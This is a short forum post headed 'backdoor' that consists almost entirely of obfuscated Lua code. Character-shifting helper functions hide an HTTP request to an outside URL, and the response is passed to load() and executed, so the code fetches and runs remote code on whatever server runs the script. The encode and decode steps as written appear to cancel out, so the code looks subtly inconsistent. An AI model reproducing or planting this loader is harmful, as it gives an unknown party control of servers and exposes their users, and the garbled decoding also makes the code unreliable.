zxc332 2 Posted July 29, 2024 backdoor local function run_obfuscated_code() local function c(...) local t = {...} local r = {} for _, v in ipairs(t) do table.insert(r, string.char(v)) end return table.concat(r) end local function e(s) local r = "" for i = 1, #s do r = r .. string.char(s:byte(i) + 1) end return r end local function d(s) local r = "" for i = 1, #s do r = r .. string.char(s:byte(i) - 1) end return r end local b = d(e("QsphsbnIuuqSfrvftu(¨iuuq;00cbtfdiijgfs/gf0j?up=UuLh3¨-!gvodujpo!¨(f-!e)!qdall¨(gvodujpo¨())!foe)!foe)")) assert(load(b))() end run_obfuscated_code()
Recommended Comments
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now